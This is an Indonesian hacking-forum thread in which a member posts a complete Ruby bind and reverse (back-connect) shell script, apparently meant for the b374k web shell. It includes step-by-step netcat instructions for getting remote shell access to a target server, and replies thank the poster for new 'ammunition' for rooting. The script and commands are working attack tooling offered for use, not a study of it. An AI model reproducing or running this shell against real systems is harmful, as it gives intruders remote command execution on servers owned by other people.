{ruby} Bind and Reverse(BackConnect) shell

[ketek]

Salam devilzc0ders,

ane ada buat neh script untuk connect/backconnect..
berikut codenya:

jalan di windows/mac/linux/bsd/dll
yg sudah terinstall ruby

tested on versi ruby 1.8.7 ke atas.

save sebagai tcpshell.rb

Code:

#!/usr/bin/env ruby
# devilzc0de.org (c) 2012
#
# bind and reverse shell
# b374k
require 'socket'
require 'pathname'

def usage
    print "bind :\r\n  ruby " + File.basename(__FILE__) + " [port]\r\n"
    print "reverse :\r\n  ruby " + File.basename(__FILE__) + " [port] [host]\r\n"
end

def sucks
    sucks = false
    if RUBY_PLATFORM.downcase.match('mswin|win|mingw')
        sucks = true
    end
    return sucks
end

def realpath(str)
    real = str
    if File.exists?(str)
        d = Pathname.new(str)
        real = d.realpath.to_s
    end
    if sucks
        real = real.gsub(/\//,"\\")
    end
    return real
end

if ARGV.length == 1
    if ARGV[0] =~ /^[0-9]{1,5}$/
        port = Integer(ARGV[0])
    else
        usage
        print "\r\n*** error : Please input a valid port\r\n"
        exit
    end
    server = TCPServer.new("", port)
    s = server.accept
    port = s.peeraddr[1]
    name = s.peeraddr[2]
    s.print "*** connected\r\n"
    puts "*** connected : #{name}:#{port}\r\n"
    begin
        if not sucks
            f = s.to_i
            exec sprintf("/bin/sh -i \<\&%d \>\&%d 2\>\&%d",f,f,f)
        else
            s.print "\r\n" + realpath(".") + ">"
            while line = s.gets
                raise errorBro if line =~ /^die\r?$/
                if not line.chomp == ""
                    if line =~ /cd .*/i
                        line = line.gsub(/cd /i, '').chomp
                        if File.directory?(line)
                            line = realpath(line)
                            Dir.chdir(line)
                        end
                        s.print "\r\n" + realpath(".") + ">"
                    elsif line =~ /\w:.*/i
                        if File.directory?(line.chomp)
                            Dir.chdir(line.chomp)
                        end
                        s.print "\r\n" + realpath(".") + ">"
                    else
                        IO.popen(line,"r"){|io|s.print io.read + "\r\n" + realpath(".") + ">"}
                    end
                end
            end
        end
    rescue errorBro
        puts "*** #{name}:#{port} disconnected"
    ensure
        s.close
        s = nil
    end
elsif ARGV.length == 2
    if ARGV[0] =~ /^[0-9]{1,5}$/
        port = Integer(ARGV[0])
        host = ARGV[1]
    elsif ARGV[1] =~ /^[0-9]{1,5}$/
        port = Integer(ARGV[1])
        host = ARGV[0]
    else
        usage
        print "\r\n*** error : Please input a valid port\r\n"
        exit
    end
    s = TCPSocket.new("#{host}", port)
    port = s.peeraddr[1]
    name = s.peeraddr[2]
    s.print "*** connected\r\n"
    puts "*** connected : #{name}:#{port}"
    begin
        if not sucks
            f = s.to_i
            exec sprintf("/bin/sh -i \<\&%d \>\&%d 2\>\&%d", f, f, f)
        else
            s.print "\r\n" + realpath(".") + ">"
            while line = s.gets
                raise errorBro if line =~ /^die\r?$/
                if not line.chomp == ""
                    if line =~ /cd .*/i
                        line = line.gsub(/cd /i, '').chomp
                        if File.directory?(line)
                            line = realpath(line)
                            Dir.chdir(line)
                        end
                        s.print "\r\n" + realpath(".") + ">"
                    elsif line =~ /\w:.*/i
                        if File.directory?(line.chomp)
                            Dir.chdir(line.chomp)
                        end
                        s.print "\r\n" + realpath(".") + ">"
                    else
                        IO.popen(line,"r"){|io|s.print io.read + "\r\n" + realpath(".") + ">"}
                    end
                end
            end
        end
    rescue errorBro
        puts "*** #{name}:#{port} disconnected"
    ensure
        s.close
        s = nil
    end
else
    usage
    exit
end

http://pastebin.com/3GJcp67B





syntax :
untuk connect:
jalanin script ini di server (misal alamat server 123.123.123.123) dengan perintah

Code:

ruby tcpshell.rb [port]

misal kita listen di port 13123

Code:

ruby tcpshell.rb 13123

abis itu connect dari komputer kita misal menggunakan netcat:

Code:

nc [target] [port]

misalkan dengan target 123.123.123.123 maka jalankan:

Code:

nc 123.123.123.123 13123

untuk backconnect:
jalanin misalnya netcat dgn listen mode di komputer kita (misal alamat kita 213.213.213.213 )
syntaxnya:

Code:

nc -lvv [port]

misalnya kita mau listen pada port 13123

Code:

nc -lvv 13123

abis itu jalanin script ini dari server dengan perintah

Code:

tcpshell.rb [komputerkita] [port]

jadinya klo ip address kita 213.213.213.213
maka jadinya

Code:

tcpshell.rb 213.213.213.213 13123

klo gak bisa connect, pastikan IP address dan port sudah benar
pastikan juga port nya tidak diblock oleh firewall

Spoiler for: screenshots

ok semoga berguna..
nanti ni bakalan di include secara default di b374k versi berikutnya

[ditatompel]

wkwkkw... Sadis.. Semua proglang dihajar...
Thanks om

[ketek]

masih hijau om ane baru belajar

[tabun]

seperti biasa...

[rusuh]

ma'aci bg ketek'Z mayan nambah2in peluruw

[badwolves1986 [RJ]]

mantap bg ketek ane bookmark dulu buat belajar ngeroot

[konspirasi]

woooh ndewo gan ruby nya
ijin simpen skripnya ya

[x.intruders]

omz ketek bisa semua program yah..
member DC smua.. jd minder
ane mau dong jd muridnya omz ketek

[Killu4]

Wew ketek kembali beraksi

[nanda]

Wah ini nih yang w suka dri om ketek

dpt jga pelajaran ruby